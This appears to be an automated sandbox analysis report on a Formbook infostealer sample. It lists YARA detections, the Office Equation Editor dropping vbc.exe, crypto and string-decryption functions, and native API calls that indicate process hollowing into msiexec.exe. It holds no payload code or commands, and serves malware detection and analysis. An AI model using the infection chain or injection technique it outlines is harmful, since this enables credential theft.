Source: Yara match File source: 00000008.00000002.698230838.00000000003D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.525124582.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Cielert.tmp, type: DROPPED

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.552022647.0000000009317000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.552022647.0000000009317000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.560670130.00000000002F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.560670130.00000000002F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.545422441.0000000009317000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.545422441.0000000009317000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.524809479.0000000000401000.00000020.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.524809479.0000000000401000.00000020.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.698410685.00000000008D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.698410685.00000000008D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.560797840.0000000000430000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.560797840.0000000000430000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.525559537.000000000060D000.00000004.00000020.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.525559537.000000000060D000.00000004.00000020.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.698075254.00000000000D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.698075254.00000000000D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.560772297.0000000000401000.00000020.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.560772297.0000000000401000.00000020.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.698230838.00000000003D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.698230838.00000000003D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.525124582.0000000000401000.00000020.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.525124582.0000000000401000.00000020.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Temp\Cielert.tmp, type: DROPPED Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: C:\Users\user\AppData\Local\Temp\Cielert.tmp, type: DROPPED Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hnmy[1].exe Jump to dropped file
Yara signature match
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.552022647.0000000009317000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.552022647.0000000009317000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.560670130.00000000002F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.560670130.00000000002F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.545422441.0000000009317000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.545422441.0000000009317000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.524809479.0000000000401000.00000020.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.524809479.0000000000401000.00000020.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.698410685.00000000008D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.698410685.00000000008D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.560797840.0000000000430000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.560797840.0000000000430000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.525559537.000000000060D000.00000004.00000020.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.525559537.000000000060D000.00000004.00000020.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.698075254.00000000000D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.698075254.00000000000D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.560772297.0000000000401000.00000020.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.560772297.0000000000401000.00000020.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.698230838.00000000003D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.698230838.00000000003D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.525124582.0000000000401000.00000020.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.525124582.0000000000401000.00000020.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\AppData\Local\Temp\Cielert.tmp, type: DROPPED Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: C:\Users\user\AppData\Local\Temp\Cielert.tmp, type: DROPPED Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 4_2_00440688 4_2_00440688
Source: C:\Users\Public\vbc.exe Code function: 4_2_00435148 4_2_00435148
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042C38B 4_2_0042C38B
Source: C:\Users\Public\vbc.exe Code function: 4_2_00431940 4_2_00431940
Source: C:\Users\Public\vbc.exe Code function: 4_2_00429BA4 4_2_00429BA4
Source: C:\Users\Public\vbc.exe Code function: 5_2_00401030 5_2_00401030
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041C8C5 5_2_0041C8C5
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B8F3 5_2_0041B8F3
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041C134 5_2_0041C134
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041D2AE 5_2_0041D2AE
Source: C:\Users\Public\vbc.exe Code function: 5_2_00408C8B 5_2_00408C8B
Source: C:\Users\Public\vbc.exe Code function: 5_2_00408C90 5_2_00408C90
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402D90 5_2_00402D90
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041CF5F 5_2_0041CF5F
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402FB0 5_2_00402FB0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0078905A 5_2_0078905A
Source: C:\Users\Public\vbc.exe Code function: 5_2_00773040 5_2_00773040
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079D005 5_2_0079D005
Source: C:\Users\Public\vbc.exe Code function: 5_2_0076E0C6 5_2_0076E0C6
Source: C:\Users\Public\vbc.exe Code function: 5_2_0076E2E9 5_2_0076E2E9
Source: C:\Users\Public\vbc.exe Code function: 5_2_00811238 5_2_00811238
Source: C:\Users\Public\vbc.exe Code function: 5_2_007BA37B 5_2_007BA37B
Source: C:\Users\Public\vbc.exe Code function: 5_2_00777353 5_2_00777353
Source: C:\Users\Public\vbc.exe Code function: 5_2_008163BF 5_2_008163BF
Source: C:\Users\Public\vbc.exe Code function: 5_2_00772305 5_2_00772305
Source: C:\Users\Public\vbc.exe Code function: 5_2_007963DB 5_2_007963DB
Source: C:\Users\Public\vbc.exe Code function: 5_2_0076F3CF 5_2_0076F3CF
Source: C:\Users\Public\vbc.exe Code function: 5_2_007AD47D 5_2_007AD47D
Source: C:\Users\Public\vbc.exe Code function: 5_2_007F443E 5_2_007F443E
Source: C:\Users\Public\vbc.exe Code function: 5_2_00781489 5_2_00781489
Source: C:\Users\Public\vbc.exe Code function: 5_2_007A5485 5_2_007A5485
Source: C:\Users\Public\vbc.exe Code function: 5_2_007B6540 5_2_007B6540
Source: C:\Users\Public\vbc.exe Code function: 5_2_0077351F 5_2_0077351F
Source: C:\Users\Public\vbc.exe Code function: 5_2_0078C5F0 5_2_0078C5F0
Source: C:\Users\Public\vbc.exe Code function: 5_2_007BA634 5_2_007BA634
Source: C:\Users\Public\vbc.exe Code function: 5_2_00812622 5_2_00812622
Source: C:\Users\Public\vbc.exe Code function: 5_2_0077E6C1 5_2_0077E6C1
Source: C:\Users\Public\vbc.exe Code function: 5_2_00774680 5_2_00774680
Source: C:\Users\Public\vbc.exe Code function: 5_2_007A57C3 5_2_007A57C3
Source: C:\Users\Public\vbc.exe Code function: 5_2_0077C7BC 5_2_0077C7BC
Source: C:\Users\Public\vbc.exe Code function: 5_2_007F579A 5_2_007F579A
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079286D 5_2_0079286D
Source: C:\Users\Public\vbc.exe Code function: 5_2_0077C85C 5_2_0077C85C
Source: C:\Users\Public\vbc.exe Code function: 5_2_0080F8EE 5_2_0080F8EE
Source: C:\Users\Public\vbc.exe Code function: 5_2_0081098E 5_2_0081098E
Source: C:\Users\Public\vbc.exe Code function: 5_2_007F5955 5_2_007F5955
Source: C:\Users\Public\vbc.exe Code function: 5_2_007F394B 5_2_007F394B
Source: C:\Users\Public\vbc.exe Code function: 5_2_007869FE 5_2_007869FE
Source: C:\Users\Public\vbc.exe Code function: 5_2_007729B2 5_2_007729B2
Source: C:\Users\Public\vbc.exe Code function: 5_2_00823A83 5_2_00823A83
Source: C:\Users\Public\vbc.exe Code function: 5_2_0081CBA4 5_2_0081CBA4
Source: C:\Users\Public\vbc.exe Code function: 5_2_00797B00 5_2_00797B00
Source: C:\Users\Public\vbc.exe Code function: 5_2_0076FBD7 5_2_0076FBD7
Source: C:\Users\Public\vbc.exe Code function: 5_2_007FDBDA 5_2_007FDBDA
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02711238 8_2_02711238
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0266E2E9 8_2_0266E2E9
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_026BA37B 8_2_026BA37B
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02677353 8_2_02677353
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02672305 8_2_02672305
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0266F3CF 8_2_0266F3CF
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_026963DB 8_2_026963DB
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02673040 8_2_02673040
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0268905A 8_2_0268905A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0269D005 8_2_0269D005
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0266E0C6 8_2_0266E0C6
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02712622 8_2_02712622
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0267E6C1 8_2_0267E6C1
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02674680 8_2_02674680
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0267C7BC 8_2_0267C7BC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_026F579A 8_2_026F579A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02681489 8_2_02681489
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_026A5485 8_2_026A5485
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0267351F 8_2_0267351F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0268C5F0 8_2_0268C5F0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02723A83 8_2_02723A83
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02697B00 8_2_02697B00
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0266FBD7 8_2_0266FBD7
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_026FDBDA 8_2_026FDBDA
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0271CBA4 8_2_0271CBA4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0269286D 8_2_0269286D
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0267C85C 8_2_0267C85C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0270F8EE 8_2_0270F8EE
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_026F5955 8_2_026F5955
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_026869FE 8_2_026869FE
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_026729B2 8_2_026729B2
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0271098E 8_2_0271098E
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0268EE4C 8_2_0268EE4C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_026A2E2F 8_2_026A2E2F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0269DF7C 8_2_0269DF7C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02680F3F 8_2_02680F3F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0267CD5B 8_2_0267CD5B
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_026A0D3B 8_2_026A0D3B
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0270FDDD 8_2_0270FDDD
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_000EC8C5 8_2_000EC8C5
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_000D8C8B 8_2_000D8C8B
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_000D8C90 8_2_000D8C90
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_000D2D90 8_2_000D2D90
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_000D2FB0 8_2_000D2FB0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_00B96F06 8_2_00B96F06
Found potential string decryption / allocating functions
Source: C:\Users\Public\vbc.exe Code function: String function: 007DF970 appears 68 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00425CA0 appears 138 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0076DF5C appears 96 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0076E2A8 appears 32 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00425873 appears 32 times
Source: C:\Users\Public\vbc.exe Code function: String function: 007B3F92 appears 89 times
Source: C:\Users\Public\vbc.exe Code function: String function: 007B373B appears 191 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 026B3F92 appears 105 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 026DF970 appears 81 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 026B373B appears 238 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 0266DF5C appears 102 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 0266E2A8 appears 38 times
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 4_2_0044405D NtTerminateProcess, 4_2_0044405D
Source: C:\Users\Public\vbc.exe Code function: 4_2_00440058 NtCreateFile, 4_2_00440058
Source: C:\Users\Public\vbc.exe Code function: 4_2_004462A8 NtCreateFile,NtCreateSection,NtMapViewOfSection, 4_2_004462A8
Source: C:\Users\Public\vbc.exe Code function: 4_2_004464A8 NtCreateFile,NtCreateSection,NtMapViewOfSection,NtClose, 4_2_004464A8
Source: C:\Users\Public\vbc.exe Code function: 4_2_00440568 NtCreateFile,NtCreateSection,NtMapViewOfSection,NtClose, 4_2_00440568
Source: C:\Users\Public\vbc.exe Code function: 4_2_004415A8 NtWriteFile,NtCreateSection,NtClose, 4_2_004415A8
Source: C:\Users\Public\vbc.exe Code function: 4_2_00440688 CreateProcessInternalW,NtQueryInformationProcess,NtUnmapViewOfSection,NtMapViewOfSection,NtSetContextThread,NtWriteVirtualMemory,NtResumeThread,NtClose,NtFreeVirtualMemory,NtUnmapViewOfSection, 4_2_00440688
Source: C:\Users\Public\vbc.exe Code function: 4_2_0043FEE8 NtAllocateVirtualMemory, 4_2_0043FEE8
Source: C:\Users\Public\vbc.exe Code function: 4_2_00440C17 NtClose,NtFreeVirtualMemory,NtUnmapViewOfSection, 4_2_00440C17
Source: C:\Users\Public\vbc.exe Code function: 4_2_00440F0A NtClose,NtFreeVirtualMemory,NtUnmapViewOfSection, 4_2_00440F0A
Source: C:\Users\Public\vbc.exe Code function: 5_2_004185F0 NtCreateFile, 5_2_004185F0
Source: C:\Users\Public\vbc.exe Code function: 5_2_004186A0 NtReadFile, 5_2_004186A0
Source: C:\Users\Public\vbc.exe Code function: 5_2_00418720 NtClose, 5_2_00418720
Source: C:\Users\Public\vbc.exe Code function: 5_2_004187D0 NtAllocateVirtualMemory, 5_2_004187D0
Source: C:\Users\Public\vbc.exe Code function: 5_2_004185EA NtCreateFile, 5_2_004185EA
Source: C:\Users\Public\vbc.exe Code function: 5_2_00760078 NtResumeThread,LdrInitializeThunk, 5_2_00760078
Source: C:\Users\Public\vbc.exe Code function: 5_2_00760048 NtProtectVirtualMemory,LdrInitializeThunk, 5_2_00760048
Source: C:\Users\Public\vbc.exe Code function: 5_2_007600C4 NtCreateFile,LdrInitializeThunk, 5_2_007600C4
Source: C:\Users\Public\vbc.exe Code function: 5_2_007607AC NtCreateMutant,LdrInitializeThunk, 5_2_007607AC
Source: C:\Users\Public\vbc.exe Code function: 5_2_0075F900 NtReadFile,LdrInitializeThunk, 5_2_0075F900
Source: C:\Users\Public\vbc.exe Code function: 5_2_0075F9F0 NtClose,LdrInitializeThunk, 5_2_0075F9F0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0075FAE8 NtQueryInformationProcess,LdrInitializeThunk, 5_2_0075FAE8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0075FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_0075FAD0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0075FB68 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_0075FB68
Source: C:\Users\Public\vbc.exe Code function: 5_2_0075FBB8 NtQueryInformationToken,LdrInitializeThunk, 5_2_0075FBB8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0075FC60 NtMapViewOfSection,LdrInitializeThunk, 5_2_0075FC60
Source: C:\Users\Public\vbc.exe Code function: 5_2_0075FC90 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_0075FC90
Source: C:\Users\Public\vbc.exe Code function: 5_2_0075FDC0 NtQuerySystemInformation,LdrInitializeThunk, 5_2_0075FDC0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0075FD8C NtDelayExecution,LdrInitializeThunk, 5_2_0075FD8C
Source: C:\Users\Public\vbc.exe Code function: 5_2_0075FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 5_2_0075FED0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0075FEA0 NtReadVirtualMemory,LdrInitializeThunk, 5_2_0075FEA0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0075FFB4 NtCreateSection,LdrInitializeThunk, 5_2_0075FFB4
Source: C:\Users\Public\vbc.exe Code function: 5_2_00760060 NtQuerySection, 5_2_00760060
Source: C:\Users\Public\vbc.exe Code function: 5_2_007610D0 NtOpenProcessToken, 5_2_007610D0
Source: C:\Users\Public\vbc.exe Code function: 5_2_00761148 NtOpenThread, 5_2_00761148
Source: C:\Users\Public\vbc.exe Code function: 5_2_0076010C NtOpenDirectoryObject, 5_2_0076010C
Source: C:\Users\Public\vbc.exe Code function: 5_2_007601D4 NtSetValueKey, 5_2_007601D4
Source: C:\Users\Public\vbc.exe Code function: 5_2_0075F8CC NtWaitForSingleObject, 5_2_0075F8CC
Source: C:\Users\Public\vbc.exe Code function: 5_2_00761930 NtSetContextThread, 5_2_00761930
Source: C:\Users\Public\vbc.exe Code function: 5_2_0075F938 NtWriteFile, 5_2_0075F938
Source: C:\Users\Public\vbc.exe Code function: 5_2_0075FA50 NtEnumerateValueKey, 5_2_0075FA50
Source: C:\Users\Public\vbc.exe Code function: 5_2_0075FA20 NtQueryInformationFile, 5_2_0075FA20
